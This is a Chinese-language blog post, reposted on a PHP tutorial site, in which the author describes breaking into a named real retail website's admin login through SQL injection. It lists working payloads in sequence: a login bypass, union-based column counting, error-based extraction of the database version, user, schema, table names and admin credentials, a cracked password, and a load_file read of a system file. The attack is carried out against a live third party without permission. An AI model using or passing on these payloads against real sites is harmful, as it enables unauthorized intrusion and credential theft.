网站地图    收藏   

主页 > 后端 > 网站安全 >

登录注入实践运用 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 今天在**论坛中闲逛的时候,看见一个求助tie,就进去看了一下网站:http://www.smartbuyglasses.com.tw//admin/login.php恰好刚刚学习了登录刚注入 正好实践一下在username:框中输入 1rsquo; and 1=2 #...

 今天在**论坛中闲逛的时候,看见一个求助tie,就进去看了一下
网站:http://www.smartbuyglasses.com.tw//admin/login.php
图片1.jpg
 
恰好刚刚学习了  登录刚注入   正好实践一下
在  username:框中输入   1’ and 1=2 #
Password: 框中输入   任意字符    (在密码框中不要输入注入代码,因为MD5加密)
出现页面



图片2.jpg
接着   在用户名框中输入   1’ or 1=1  #
出现界面         


图片3.jpg
到这里  我们就知道  如果出错就会出现第一个情况,正确就会跳转到另一个页面。
接着我们确定表段数
在  用户名框中输入 1’  union select 1 #
出现界面 www.2cto.com


图片4.jpg
从这个页面中我们可以得到信息,  存储用户密码的表是 user_information
用户字段名   username     密码字段名  password
重要的是  The used SELECT statements have a different number of columns
说明  字段数不匹配
接着在  用户名框中输入  1’ union select1,2 #       出错
    1’ union select 1,,2,3#      出错
当输入                  1’ union  select 1,2,3,4#     
   返回到
图片5.jpg
 
说明 是4个字段   
  接着  判断他的 版本  
在   用户框中输入
'union select 1 from (select count(*),concat(floor(rand(0)*2),(select version()))a from information_schema.tables group by a)b#
图片6.jpg
 
5.0.95     可以利用information_schema 来暴库
看看用户
'union select 1 from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b#
图片7.jpg
 
用户名 root  我去     内网的
数据库
'union select 1 from (select count(*),concat(floor(rand(0)*2),(select database()))a from information_schema.tables group by a)b#
图片8.jpg
 
数据库 :sbg
有了这些信息后 ,你可以 利用information_schema来暴库
在用户名  输入  
爆出 表名
'union select 2 from (select count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=database() limit 0,1))a from information_schema.tables group by a)b#
大家只要 将 limit 0,1   0 慢慢加一就行了  


图片9.jpg 
得出第一个  CL_category
因为 我们刚才 从错误信息 可以的出  用户表   是user_information
所以 不需要爆了   
这里 我们  爆一下他的用户名
在用户名框中输入
'union select 2 from (select count(*),concat(floor(rand(0)*2),(select username from user_information))a from information_schema.tables group by a)b#


图片10.jpg
爆出密码  :  admin
接着爆密码
'union select 2 from (select count(*),concat(floor(rand(0)*2),(select password from user_information))a from information_schema.tables group by a)b#

图片11.jpg
得出hash  e041cd802629792e7e6e0d0e3ed287d9
  到 cmd5  解密   有收费 没钱的孩子 伤不起  到群里问问吧
好人还是多按      密码  :nekiowang
但是不知道 怎么了   我的密码 就是登不上去         郁闷了  
刚才 用户是 root  大家也可以  读他的配置文件   
输入代码
'union select 2 from (select count(*),concat(floor(rand(0)*2),(substring(load_file(0x2F6574632F6973737565),1,64)))a from information_schema.tables group by a)b#
来读   linux的 /etc/issue  内核参数
图片12.jpg
 
好了  登录注入  就到 这了 这个真的是我亲自做的
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论